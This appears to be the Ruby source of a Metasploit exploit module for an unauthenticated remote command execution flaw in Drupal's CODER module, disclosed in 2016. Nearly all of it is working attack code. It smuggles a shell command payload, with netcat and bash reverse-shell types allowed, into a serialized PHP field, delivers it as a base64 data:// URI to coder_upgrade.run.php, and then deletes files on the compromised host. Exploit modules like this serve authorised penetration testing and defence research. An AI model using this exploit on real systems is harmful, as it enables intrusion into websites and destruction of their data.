GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/drupal_coder_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Declares module metadata, payload constraints and the single TARGETURI
  # option, then flags the module for post-exploitation cleanup.
  #
  # @param info [Hash] module info merged into the defaults by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Drupal CODER Module Remote Command Execution',
        'Description' => %q{
          This module exploits a Remote Command Execution vulnerability in the
          Drupal CODER Module. Unauthenticated users can execute arbitrary
          commands under the context of the web server user.

          The CODER module doesn't sufficiently validate user inputs in a script
          file that has the PHP extension. A malicious unauthenticated user can
          make requests directly to this file to execute arbitrary commands.
          The module does not need to be enabled for this to be exploited.

          This module was tested against CODER 2.5 with Drupal 7.5 installed on
          Ubuntu Server.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Nicky Bloor <[email protected]>', # discovery
          'Mehmet Ince <[email protected]>' # msf module
        ],
        'References' => [
          ['URL', 'https://www.drupal.org/node/2765575']
        ],
        'Privileged' => false,
        # Command payloads only, capped at 250 bytes with no NOP padding.
        # "\x2f" ('/') is excluded from generated payloads — presumably because
        # the command is embedded in a serialized string field below; confirm.
        'Payload' => {
          'Space' => 250,
          'DisableNops' => true,
          'BadChars' => "\x2f",
          'Compat' =>
          {
            'PayloadType' => 'cmd cmd_bash',
            'RequiredCmd' => 'generic netcat netcat-e bash-tcp'
          },
        },
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'Targets' => [ ['Automatic', {}] ],
        'DisclosureDate' => '2016-07-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
      ]
    )

    # Cleanup is performed in on_new_session below once a session arrives.
    self.needs_cleanup = true
  end

  # Fingerprints the target by requesting the CODER upgrade script directly
  # with no `file` parameter. No exploitation is attempted here.
  #
  # The script is expected to answer with its concatenated error text
  # ("file parameter is not set" + "No path to parameter file"), which is
  # the marker matched below.
  #
  # @return [Exploit::CheckCode] Appears when the marker text is present in
  #   the response body, Safe otherwise (including when no response arrives)
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php')
    )

    if res && res.body.include?('file parameter is not setNo path to parameter file')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  # Builds the serialized PHP structure the upgrade script reads as its
  # parameter file and delivers it through the `file` GET parameter as a
  # base64 data:// URI.
  #
  # The encoded command payload is embedded in the "new_dir" string. Its
  # serialized length is payload length + 5 to cover the "-v;" prefix and
  # the " #" suffix written around it. 'encode_params' is false so the
  # data:// value is sent verbatim rather than URL-encoded.
  #
  # Detection note: a GET to this script path whose `file` parameter carries
  # a data://text/plain;base64 URI is the observable indicator of this
  # module's traffic.
  def exploit
    p = ''
    p << 'a:6:{s:5:"paths";a:3:{s:12:"modules_base";s:8:"../../..";s:10:"files_base";s:5:"../..";s:14:"libraries_base";s:5:"../..";}'
    p << 's:11:"theme_cache";s:16:"theme_cache_test";'
    p << 's:9:"variables";s:14:"variables_test";'
    p << 's:8:"upgrades";a:1:{i:0;a:2:{s:4:"path";s:2:"..";s:6:"module";s:3:"foo";}}'
    p << 's:10:"extensions";a:1:{s:3:"php";s:3:"php";}'
    p << 's:5:"items";a:1:{i:0;a:3:{s:7:"old_dir";s:12:"../../images";'
    p << 's:7:"new_dir";s:'
    # +5 = length of '-v;' (3) plus ' #' (2) surrounding the payload.
    p << (payload.encoded.length + 5).to_s
    p << ':"-v;'
    p << payload.encoded
    p << ' #";s:4:"name";s:4:"test";}}}'

    pl = "data://text/plain;base64,#{Rex::Text.encode_base64(p)}"

    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
      'encode_params' => false,
      'vars_get' => {
        'file' => pl
      }
    )
  end

  # XXX: FileDropper can't handle weird filenames
  #
  # Removes artifacts left in the script's working directory after a session
  # is established. The delete is guarded by a test that
  # coder_upgrade.run.php exists in the current directory, so nothing is
  # removed if the shell lands elsewhere; the script itself is preserved.
  #
  # @param session the newly opened session used to run the cleanup command
  def on_new_session(session)
    # This find command should be decently portable...
    command = '[ -f coder_upgrade.run.php ] && find . \! -name coder_upgrade.run.php -delete'
    print_status("Cleaning up: #{command}")
    session.shell_command_token(command)
  end
end